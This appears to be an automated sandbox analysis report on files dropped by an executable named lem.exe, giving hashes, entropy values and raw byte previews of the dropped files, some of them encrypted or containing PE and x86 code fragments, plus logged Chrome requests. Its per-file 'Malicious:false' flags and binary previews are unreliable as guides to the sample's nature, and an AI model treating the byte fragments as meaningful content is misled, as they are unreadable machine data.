                                                                                                                                                                                                                                                                                          Preview:....."...U(.E.Bx.M.C...;Z0|....U(.E.9G.u.E...A........U(.u..B0;.|x.](.K8;.|@.<.k..P......Y....d"..kC8.P.s(V.Vh......{8.~..s(.p...Y.C0.s(.{8.U.k...C(...kK0..C(.U..T..kK0..C(.U.T...C0.u..M(j.X...u...-..j._......U.......}..-...E..j.X....M.....&..3...E...+.......#...]..E.SP.N..U..'.....3.YY.u.9...."...E..M...+..............](..f;.w0.{...j.[......U..8t.........f;.h...v..](.....j#Xf;.......j.X....>f..t........K...t';.sM.u.......WQ...........t4...4V.q............+.;.w.f;.....u.;U.t.f.F.f;.....t.j.Y..}..t.f.......f#.....f;.u.....>f....t...........3.u...+..f9V....+..f9F....+......u....f....S......j)Xf;.t..r..u........f..u.f9...,...j?Z..*...E.E...*..........*..j.^VR.B.P......U.F}.}........},..}.f..jxXf.r.f.B.f.r..t.......u?.E(j.Y.P .@...;.r*.E(.M...r.j.+H.X....;.u..F.f.B..u..U..r*...U.u..g*..jnXf;.......joXf;.......jpXf;.......jqXf;.........r......jsXf;.........t......j..A.[f;........E.+..E...3....E.E......].f;.u....f9B....*.......f;.M.s......*...E...x....~..E.E....E.....
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):76800
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.686304303605537
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:8Y464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cy:t4qv+32eOyKODOSpQSAU4Cy
                                                                                                                                                                                                                                                                                          MD5:83828D024D7CAA17F6E52969E845D8E0
                                                                                                                                                                                                                                                                                          SHA1:FB7538D9D4B604B128828B4CAD2F53CD2195D9C1
                                                                                                                                                                                                                                                                                          SHA-256:BE0CCB43F0E2AA9090CECE1093DC56131AD5CC655D5CA35A53306CEFCEF56F8E
                                                                                                                                                                                                                                                                                          SHA-512:41C95DD45EBB805A45CFEB197CACC830F9AC895FB966AC94CC688A206747E9BA3149A7698B1194CD4AD9B7C30CA571FEA115F22D8DF844472BA7E6D1D14782D7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]..U..E...........$...B..u..u..c...YY]..u..u..w.....E..u........P....YY3.].E..u........P.+.....E..u........P.U.....E..u........P.......u........u.j..<...YY3.@].E..u........P."...YYj.X].E..u........P....YYj.....B..B...B...B.+.B.@.B.U.B._.B.p.B...B...V..F......P....F.3.f...F...^.......y..t....j.h....h."J.hx"J.h."J..S....y..u....j.h....h."J.h."J.hL#J........U..M..y..t.....P.u......YY].....3.8M...............]..U...$SV.u.3.W.}.;.w....w....].t..H..........].H.u.... .E.3.@....E....3.J......+.M.+.U.8E..M....H%........E.;.~..u..u..B...YYj.X....3.8E....H%.......;...5....E.H...M.....E.M...........E...@.......H.3.3.@.u...M..E....E......U.E.3.3.@.u..#..E..#...u..]..E.M.#.#.....u...M.8].t..E..U.#.#....t....E...u...t5.i.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M....."u.................t).M...!..;...]...w.;...S....].+].+].K.G....u..u......YYj......M................U..@r..........3..J.@3..t...M.E....E.....U..E.3.3.@.bt..#..E..#...u..]..
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):88064
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.541206148230026
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:5KPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/S+:58QuklMBNIimuzaAwusPL
                                                                                                                                                                                                                                                                                          MD5:6689078E7ECA2AE3429263C902005A36
                                                                                                                                                                                                                                                                                          SHA1:13348F7B86189E5BE3C1CF577235159B797C09BE
                                                                                                                                                                                                                                                                                          SHA-256:FFDBABA35048B7F354D030F47A9431FA5C752E469B87276075260904A07E08E4
                                                                                                                                                                                                                                                                                          SHA-512:E18BB61E6858598DF3A132B624A413F9427132222175EDA6E91E1D95479852AFB656D68F15D6321BD08E2910120DD45BB38655CA9AAA748150A4DEA16FB818D9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.?.......?.......?.......?.....R.?.....R.?.....$.?.....$.?.......?.......?.......?.......?.......?.......?.....t.?.....t.?.....J.?.....J.?..... .?..... .?.......?.......?.......?.......?.......?.......?.......?.......?.....\.?.....\.?.....6.?.....6.?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.....b.?.....b.?.....B.?.....B.?..... .?..... .?.......?.......?..................<....?.N~.'..<..x..z.?...'.*$=...#.f.?.$./...=.@..0..?@A.S..1=..c..E.?.Pa..B==.`..R.?Dj0Q:W$=...>m..?...Lyc>=..*p.%.?...?C;0=...|...?.Ix.".<=.``...?...y.M==..or.O.?..+C..==...v...?.....R1=.PQ....?....b.=.@...P.?.5M[g.?=...V...?d+...[7=.......?n...B.>=. kz.*.?...w.#8=.0.n..?C.#...7=..{....?D.i.00=....f.?.j....-=.x...).?...}z..=. ....?.....0$=.H.V...?....o..=.X...a.?..;.M_8=.@.....?......5=......?.^...@'=..L$...?.../r(=.....<.?.vT.. 3=...?...?..Cg..?=.0....?W/..f.1=.`.(.J.?Dk....0=.h..#..?.@.. .6=......?..._...=...|.D.?.&.?4j<=..'....?Q...n.&=......?.l.....=....6.?..DX.,
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):116736
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.310961115368738
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:zg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UT:85vPeDkjGgQaE/loUT
                                                                                                                                                                                                                                                                                          MD5:0FEF43A1D2F278AD03BB846A85EB2504
                                                                                                                                                                                                                                                                                          SHA1:1432D6AA98F4C9C45127DB74B5C02365B0B1569A
                                                                                                                                                                                                                                                                                          SHA-256:5EA9933E7E3138736B9492660E6A83696401F8E6F8041C85B1ECD28D307D5790
                                                                                                                                                                                                                                                                                          SHA-512:AB2C3BB2BD452FCA44120D6F3914D1E436F1EE85129251CD8CA9F4B4BBE7805E5508905B74D9702E402A0C05285A7E104CD00FFA476C4B7B67B17B4070A55C20
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$.
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):71389
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997603584249478
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:MT2ZVYAoeVFwNjlHzGOVEEHHK/95xfgDpkCijTCGXRz21cvGBY3exC:O2ZVNVFUlHVNHHK/DCzOCGhy1o+9xC
                                                                                                                                                                                                                                                                                          MD5:205B1F531DC790C74D39A1B682C44A3C
                                                                                                                                                                                                                                                                                          SHA1:BC5DC0B570F685910CE9122781C30BE7438DAB57
                                                                                                                                                                                                                                                                                          SHA-256:CBC6F6197C066A563511E6B51F02072FF21ECC3FE41C6DE48CA050C22E0B7B43
                                                                                                                                                                                                                                                                                          SHA-512:F03FE4176022C356A20AB210813A14D3AE4B8FE59E04AE2708DF6CE4CE28A5C5BA873D936578A13FF339506C7619975B70263451334D16D6F75895188B98AC3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...,.%..Z..Go..4W._.?.F...s..Q\.l^Y...>..b.j.W...7.....w..r<m.2.IV.....W........D.......z.AV.R...0.F-R.....9...<..mo.`..|...}s.I..W...V.e55IR|..Gx.Q.]Cb...]..).IZ....t.]W....]BM.*.C.s... .Y.<.v.b...z..c....Y.2^j.......Fe.....v...Yo....n.......m.....DlU..A.]./...di.L.RK.i.<....=.8.x1...i:.D^>9..j.#V.]u.......ty....U..I.0..>...-....{-M2..AR&.8a..!1.....c-...[.P.OkL8..'...y+Z...n..6o.:%......|v..Ou.3|..i.x......*.5.qO...X..O..D....@..f..%?7U.)..Z..+.C..n*%d<.|...r..{.tY..)....}R...Q...D...4Py......j.......gp....9&....W.....P.w..!....=#..1.....~.<.H-...?.5..B..d$.rmwQ.......(....Dj...y.G....mp.^..J-.P.J...9C.c.......AY.8.I.....Z.....X.5.-.%.r+F.4.xpA.n..A..o ...w;.9]..f.H...R.YF..`.....Q..P .@...O..2[r...."..-...-.^..Xw..7o.O.3..8...k..7P..=lO.0.o..M'..sDy@...2}.....?...9J..\.w...4.'8fd....6;".h...(..-jc.......~.F_...rhc...p.IE}c.).....Q..G-...:z....!.l..R....1.;u....uQ......XY-o....."......c.....0.M..l.7#..z.H.M...=...p2....7..aQ6G.
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9977360681233565
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:8KnGbkPNpXFQd4tW9wbuBk5WNJMOcRc+ykpNA9NhJH5Riz4pGLkKtVdEq+loayoX:FJQd4tywoXMVa+9cvhZ5o0plm7+lSijv
                                                                                                                                                                                                                                                                                          MD5:6B669AEEDE2444CAACAE56D6634856B4
                                                                                                                                                                                                                                                                                          SHA1:D2F5E1223534F3458B2C537D7F352A7F66ED2E8A
                                                                                                                                                                                                                                                                                          SHA-256:1D28DBEB808CE4112B273F21EF6F4625F3AD0C99ADC0D5B5FC3BD6CB28D2EA88
                                                                                                                                                                                                                                                                                          SHA-512:D5D172E91B02B829E8C4BB754C843A69C4B6A34764617505B8C8114F5AE788973673879C017DE1D98D7E47D714DD2BBB512D7BD574349FA2B690384FDB99DEB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...NsRcjh...)H...=.q=+."..q.H..}...=/...=_X?...9U..]Q.d.,.h...G3..X.U.>'...>..#be... ..D.x....$8.@.[.w.5d..H.E.f,8f....R..>4.......-.g...QYQ..Q......./...b.]9.8.......V....\X.Z.FD.5.7....L.v..@.Uv....;..L..DE........d..&{[go.:...b....z........V..V.N..B...:.^.|mBdqj..nn$y.......w=U.P.r...ZA.1.5. u.Y...).7t.....MR?.....}2....LM...,.zUA..]......?.B.........F..(..Q.\.....\....?t).../..p6.?BD...A.A.\..XF....[5.......?%.'...O.">..........V:.zj.'.....6...E`W..W..O.7m....7.?.?.k..c....6...`c".....J....K.1o.!in.Rt0..ekl.....,.(Q!u.v.JX..a.x.......18...........L.N.!o......T........B...2.r..$.}... ^..s...=.)..2.K...Q3`.....R....T:oN.R.<2:`._.....|}.^M.o...I. .8...W.Z....C...i...YU...*..>.:?.'.`....#.@T.,B....V....,.`.5..G_.W....6........4D..Dk..?T..@.....y..-n..[.)$.D.X..y......G2.sF.....Om......t.!..j[...A.^.>.;...6'5P?..A....0.D%%"%.....;..d!.Q..SMm......z.$.......(.AD...]....D[=..TQ,..j.g.#.K`..6...(..."=6sr.<..ak.m.W..e]`.m.w....}.H..g.].m.f.J...H
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2253
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.210185147584243
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:B9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLV9:rSEA5O5W+MfH5S1CqlV9
                                                                                                                                                                                                                                                                                          MD5:6FF1E4F807047A9554FED9CF5520B527
                                                                                                                                                                                                                                                                                          SHA1:B318525BEA237308E47AC9E54A6AAA86C1C0BAF9
                                                                                                                                                                                                                                                                                          SHA-256:4511CEBD102C965725C9E68CFE398EA6169BD0C0971FC7C083A32A45E1D31AC6
                                                                                                                                                                                                                                                                                          SHA-512:95F63CDC70E27C1C69DFC324FCDD275C8124EE67C379D3F358C1EC28AB98DE4D77CE37B89CD2A8BFE3D39867B67AC3692C35AE668C10E384A528DAEEBCBFD077
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cleared........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):59392
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996648286668622
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:cBX1dlaX3yjVMLx08/X5KK8FqluzBxXS+fX:+DAX3yCLxZpNeBNrX
                                                                                                                                                                                                                                                                                          MD5:CC60353BD3E192565DABB8EE57E563EC
                                                                                                                                                                                                                                                                                          SHA1:08CD358077018723C047DEA1235D04325C24D655
                                                                                                                                                                                                                                                                                          SHA-256:1EF7F2E0744B21850649B7BE1231AE3DB5548BAAE3E724B2058513B6AEBCA23A
                                                                                                                                                                                                                                                                                          SHA-512:F13E0CB0C19E6F61B9D4747E57D60614B91D47B8DFE73E5739BC8BF2F180D2E21D801CC8FD4A1E4F3431F0303F1B2350B80450B1CFEC67C0683470D743D17BE4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.............6=*..[.g.....p.v.t*...c.....&.H[...&.g.....?e$.9.y....>X...8...)B..e...5....(...2d.+[.[...V......V.~Q.kkA.t.r.U].d.k.A..}..r.Je...EoOz....*.....g...x..*.{.v.~.a...b.....N.....IP.GN........AWP...@5..]...2.........8\y...pi....~........i.....'m...K...M./}1..[..;}..g... x./jI..6.e.... .w......i .\.OR w...v..1.1f.j...p.;..P\B.9...4.}V.W=.0....g...I.&~..T.I..Kd.+..z.5.eBS.>n.52j.Z....V+...!.p....^%........7U...^2.....Z.9...'..p.9..u.h.]x.6g/.h.....7.dQ.u.}.....Hu.>.oG..........@.;..x....\.S{)sH5Lb..I_&.......y6^...?x..k.l......@...J.U.{].!.o.../ ....E.u.a..B...|].d&mB.s.[....a0;.?...@...._...r...1.4.k.{..q..V..Z.]:....S[.ED.....<X.1.M.......q.O.r......' .EwzM`.R'C....HsV.\....2..b.i.dDK..s)G.r..n..O..O........&.#....)...,.$.+....VBd+........w).. 3C.\j..:.6{.G0.tb.......B..'Cr...*...2..u.t.......W.......u.;.b...-k....n.w$.R.Sy.A^S.][a4.?....#{j"..G.....G8X.>.:h..Q.|...n.r.I...(..2?..]]}..]......e$"#.!..).K.>..4.X.j
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.373547942480216
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:apAiuDh3JBqjx24pKGKQ6kJBljrn5w7UYkmfOjDb138Px:aBwPuKGPakfDb13g
                                                                                                                                                                                                                                                                                          MD5:A60A51A234B633C4C402189FF0FD558E
                                                                                                                                                                                                                                                                                          SHA1:501C84ED7488AB1E4BC90EB9356740B6AA0E3D4C
                                                                                                                                                                                                                                                                                          SHA-256:392DCA52A41ED530E2AE4D2FCB2E44936AC5F7E7557378E4B60D9A3A99A239F4
                                                                                                                                                                                                                                                                                          SHA-512:50423E9325BC43FCF47F3C57222F95F08E1B73738D9067B2CD91AE6638D8AFAEB756D17F83FC13003111F82B290323DF4DBBA2D6AC75F2FEFAFFF8081834F55A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Q.#...2k.....,3.:;%.@.;,.x.a/....Uo....M.(.r..bPe...1...GX?_1..I0..E...0o0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0...`.H.e.......-0...*.H......1...*.H........0+..*.H.....41.0.0...`.H.e........*.H........0/..*.H......1". .+...9+e..X.t...pa.R.V.q.G.M%J.0....*.H......./1..0..0..0... .... .mN'Tr.h.x.edg....e.......0s0_.]0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0...*.H............>e}.l.jdX^...0...=..........X.@\....T.T...(....s.6.J.be....8Lf....k.Y...&..*.......=.80.X.k..!o.'.w.....qJ.....|....R...x.jS.C.^...ykRm...NVR...Yp..SQ..f......cA$..B..Kw......o.U3k......-|.....u.P.nD#......U.CS.].....h.A..........7..hS c..Q.r...B.@..i.U.[ko:E>....).S.....?.<R.....m..^,i...T....._.i......Q...u.....O.T.?=..$....+...o.{.PN..D..N...cp.A....P../.T.......
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:Windows Precompiled iNF, version 2.1, flags 0x2010001, unicoded, at 0x10102 "", at 0x7070709 WinDirPath, LanguageID 909, at 0x9090909 language
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):52224
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.685645875413775
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:wpkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TK:fQWf05mjccBiqXvpgf
                                                                                                                                                                                                                                                                                          MD5:7286492DA76FE467D675F4BC75A3B359
                                                                                                                                                                                                                                                                                          SHA1:410424D584323DF3FB8889BEED88E4165F523AAB
                                                                                                                                                                                                                                                                                          SHA-256:6A0534C1A06FC535E7D78FCECBA6519600D39FF0BCCC8D69010630C4484785E5
                                                                                                                                                                                                                                                                                          SHA-512:A23A7A9E4DA1CC30B0318267D1330C8B1C831D33889027107BAA6CEC9D3D13AE43D83A330BBFDE1DC8EB8D7998365746650EA476620B06620DE255A7738D8AB2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......................................................................................................................U..QS..U.VW.}.......3.....1L...C...............f;.......Bf;............f;.......Bf;............f;...:...Bf;...0........f;..."...Bf;.........}tj.....f;..........f;.tJ.....f;.t@..U........V........^......3.Bf;.........................3._^[..E.@P.....u...........r....v...v........}..........t......U...<SV.....W..]....f...M.f;.......j.Zjp.E.!....E.a...X.E......E.....f;}.......f..n..i...f..o.._...f;...V......;.........G.....]........[........t<..T..F.......1L..4F..t..A..7v"........j.Zf...M.jpf;.X..v..._^[..f.F......f#......f;.u......f;}...V.......j!Yf+.f..f..(.......E..P.E....p..E...YYj!Yf;.......f..#......f..%......f..'......3.M..E.......t .M...QP.M.Q.u....`..................E.f.}.jpX.......-......%...H.........H.........H..............f;.tVj"_...7.]..C.f;...r....]...Z........F.f;E.t.f;E................`v.jaX;.........F.....~....U...0...U.U.SV........3.
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):119808
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.643983910910844
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:70Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHk:ObfSCOMVIPPL/sZ7HS3z4
                                                                                                                                                                                                                                                                                          MD5:73842ED2C144AB22A0301F7BF71250EB
                                                                                                                                                                                                                                                                                          SHA1:7848E86E6E92E040FB635377A4BB813E6877EC10
                                                                                                                                                                                                                                                                                          SHA-256:B63DDC5DD8120693477CB2BE869E65C077A92FD27B6B44815FA702C8A07F5F80
                                                                                                                                                                                                                                                                                          SHA-512:50A43C9577319BF43031DB61336DBE4731958AC24F2C878271E6108A85653C205E6D0B067450E17528FD6239747B2C0DD1243E2B553AD417CA3C032BE52AF2D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.W.......u....9.u.[j..WX..Y..^_..]..(W..3.PPPPP.qV....U..SVW.=..M....?.t*.].S.6.u..P>.......u......<=t...t.....>.u.+......_..^[].+.......U..]......t.I.....#M.....%.#M......U..Q...L.3.E.W.}.;}.u....WV..S....t.......I....t....;u.u.;u.u....,;.t&....~..t.....t.j.......I...Y....F.;.u.2.[^.M.3._..8....]..U..Q...L.3.E.V.u.9u.t#...W.>..t.j.......I...Y....F.;E.u._.M...3.^.7....].j.h.L..N7...e...E..0.q\..Y.e...5..L.....35.#M...u..E.............X7......u.M..1.{\..Y..U.....E..M..E..E.E.P.u..E.P......]..U..E.H...t-...t....t....t....t.3.]..#M.]..#M.]..#M.]..#M.]..U..k.x'J...E...;.t..U.9P.t....;.u.3.]..U..Q.E.Pj..]...YY..]..U...u...#M..}z...u...#M..pz...u...#M..cz...u...#M..Vz..]..^Y......j,h.L...H..3.].!]...M.u.j._;...t5.F....t"H...t'H...uL.....t....t....~;....6V.........E..Y....]..u.........3V.....YY3.......u..2..........:S......2.M.E.e....t.j..Z..Y.M.e...E...e...E..t.....L.....3...M.......E.3......U.U..........u...t.j..Z..Yj...x..;.t....t....u#.C.
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):82944
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997399353180572
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:uy7xUhDP49yfwHwrMKzD0X8jRDq7qMpnYzDYGeawL72v7aEtI:576mwrRkX8tu7pYhLwLyv7pe
                                                                                                                                                                                                                                                                                          MD5:09616A6313080EC4B3845CF427AF1DC3
                                                                                                                                                                                                                                                                                          SHA1:86801BDA1D8CB25068D8841571E1A309930CEB7B
                                                                                                                                                                                                                                                                                          SHA-256:76483C788B2C26A70DCBDA07395412BCB0A83184B5D9806344FCFCD08DC847DE
                                                                                                                                                                                                                                                                                          SHA-512:52DF199B57E222A3F8990139B414E7FD51D2C034A2CD00BBD23BDF3B3A25D745F3241744BFD394E066785D1FFD6F20BA4EA656B516903732EF304A518993ED2D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:^ .a....3..........4....p.Ver...".w....n...........h....H..ma*+.P..)_.&../.r..-..)X..BK...@....?q....@0CD.q.1.........NY....El[.Wc.6E.@.C....T.V.8[....?V.......4.b..X'..*'.M...\d....Vo.....t..to..t+....UX5.g...........n.Q{>&9....PsR.i.....Z. ,..T...^..=.....Yrm.......Nu.....8..rz..fq....`..?F...p...q..{#7pv....z.&4..._.Y..pa.}CZcU............~l2E8J.b.5J.b..s...n.oQGE.*W.f{.b..4\.\~....].l.7...B.......W1g.....8;.....Na....,.F.zA.... ...-....1@..HG.v-hq...S.Tb.Y.......4a.XTK...j.f.......9Y5...Pt......4..&).~..P.^C...8.0.-..F.kP%.W:.T."...*..{.<6....|uL..yV.A.p..hc..}..B...x..hP.0...h..H...z..Y[.`.....'|....i.........v..=.>.~H.'..'..+.jH^...zp....TcE..C.5.T.I..@...w../3..r...rr..`.xY..A.....Es.y..H.....`oC.....|'U.0{.u..+..0...Po.`WF.t..9;.>.A.E...=.Hk......#7^P...A..u......61...5..T.S...}.6....U.U..H5...,..3.qW.n..,^..U7...B....z.>...s.....C..B....R.:.7.....\..J..>...m...P.......Dv......._2.....]0A.@_G....$.f.4?.....C...M.W............5.Ao.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3452)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3457
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.836139210851907
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:TnliBSwIN6666VzXJxocccCqVMpprVoKQAd2kWO4gPrzQffffo:TlASBN6666VzZxocJTCKCd2kJv
                                                                                                                                                                                                                                                                                          MD5:F4694B5765B44809057FB106DDDD76EC
                                                                                                                                                                                                                                                                                          SHA1:1549126BBFBA774D598A974E183D1BCD02363C46
                                                                                                                                                                                                                                                                                          SHA-256:927B6FF2D6546A796563E34E7E272ADE777BE6A19717FD649B242E4C10E61689
                                                                                                                                                                                                                                                                                          SHA-512:B03CACFC6BB2344E7103C78A75A919A00012043CF5CC932FFB58B9740B5AAEF10E373245AF4F5967FBA0B1987B7EEFC3215B4EC562D6C7E7918333339F85A6B7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["santacon nyc bar crawl","luke altmyer","coryxkenshin manga","nintendo switch 2 leaks","weather forecast snow storm","december 15 full moon astrology","mega millions jackpot lottery","oliver wahlstrom boston bruins"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWdiaGM3ajUwEhRGb290YmFsbCBxdWFydGVyYmFjazLLDmRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWNBQUFEQUFJREFRQUFBQUFBQUFBQUFBQUFCZ2NFQlFFQ0F3ai94QUF5RUFBQ0FRTUNBd1lFQlFVQUFBQUFBQUFCQWdNRUJSRUFFZ1loTVFjaVFWRmhjUk1VZ1pFVk1rS2hzVU5TWXBMUi84UUFHUUVBQXdFQkFRQUFBQUFBQUFBQUFBQU
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
